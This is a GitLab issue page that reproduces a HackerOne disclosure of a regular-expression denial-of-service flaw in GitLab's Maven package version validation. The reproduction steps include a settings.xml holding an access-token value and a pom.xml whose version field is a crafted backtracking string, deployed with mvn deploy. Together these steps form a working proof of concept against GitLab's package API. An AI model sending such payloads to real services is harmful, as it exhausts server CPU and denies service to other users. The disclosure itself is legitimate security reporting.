Skip to content
GitLab
Next
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • GitLab GitLab
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 54.9k
    • Issues 54.9k
    • List
    • Boards
    • Service Desk
    • Milestones
    • Iterations
    • Requirements
  • Merge requests 1.5k
    • Merge requests 1.5k
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Package Registry
    • Container Registry
    • Terraform modules
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • GitLab.orgGitLab.org
  • GitLabGitLab
  • Issues
  • #263116
Closed (duplicated) (duplicated)
Open
Issue created Oct 07, 2020 by GitLab SecurityBot@gitlab-securitybotReporter

Maven package version ReDoS

HackerOne report #997961 by anyday on 2020-10-05, assigned to @ngeorge1:

Report | Attachments | How To Reproduce

Report

Hello,

Maven package version check https://docs.gitlab.com/ee/user/packages/maven_repository/#version-validation contains catastrophic backtracking : aaaa....! (!32925 (merged))

Steps to reproduce:

Follow Maven guide https://docs.gitlab.com/ee/user/packages/maven_repository/

  • generate project
    mvn archetype:generate -DgroupId=com.mycompany.mydepartment -DartifactId=my-project -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false

  • create settings.xml with your access token (eg at /root/.m2/settings.xml)

<settings>  
  <servers>  
    <server>  
      <id>gitlab-maven</id>  
      <configuration>  
        <httpHeaders>  
          <property>  
            <name>Private-Token</name>  
            <value>srzc2-M3ysZx-ZEKQRki</value>  
          </property>  
        </httpHeaders>  
      </configuration>  
    </server>  
  </servers>  
</settings>  

Edit pom.xml with

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">  
  <modelVersion>4.0.0</modelVersion>  
  <groupId>com.mycompany.mydepartment</groupId>  
  <artifactId>my-project</artifactId>  
  <packaging>jar</packaging>

  <version>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!/x</version><!-- regular expression denial of service -->

  <name>my-project</name>  
  <url>http://maven.apache.org</url>  
  <dependencies>  
    <dependency>  
      <groupId>junit</groupId>  
      <artifactId>junit</artifactId>  
      <version>3.8.1</version>  
      <scope>test</scope>  
    </dependency>  
  </dependencies>

  <properties><!-- Maven was complaining about something -->  
    <maven.compiler.source>6</maven.compiler.source>  
    <maven.compiler.target>6</maven.compiler.target>  
  </properties>

  <repositories><!------------------------------------------------------------ replace(3) 'gitlab.com' and 'PROJECT_ID' -->  
    <repository>  
      <id>gitlab-maven</id>  
      <url>https://gitlab.com/api/v4/packages/maven</url>  
    </repository>  
  </repositories>

  <distributionManagement>  
    <repository>  
      <id>gitlab-maven</id>  
      <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>  
    </repository>  
    <snapshotRepository>  
      <id>gitlab-maven</id>  
      <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>  
    </snapshotRepository>  
  </distributionManagement>  
</project>
  • mvn deploy

Video:
mvn_redos.mp4

Impact

Denial of service, CPU exhaustion

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • mvn_redos.mp4

How To Reproduce

Please add reproducibility information to this section:

Assignee
Assign to
Time tracking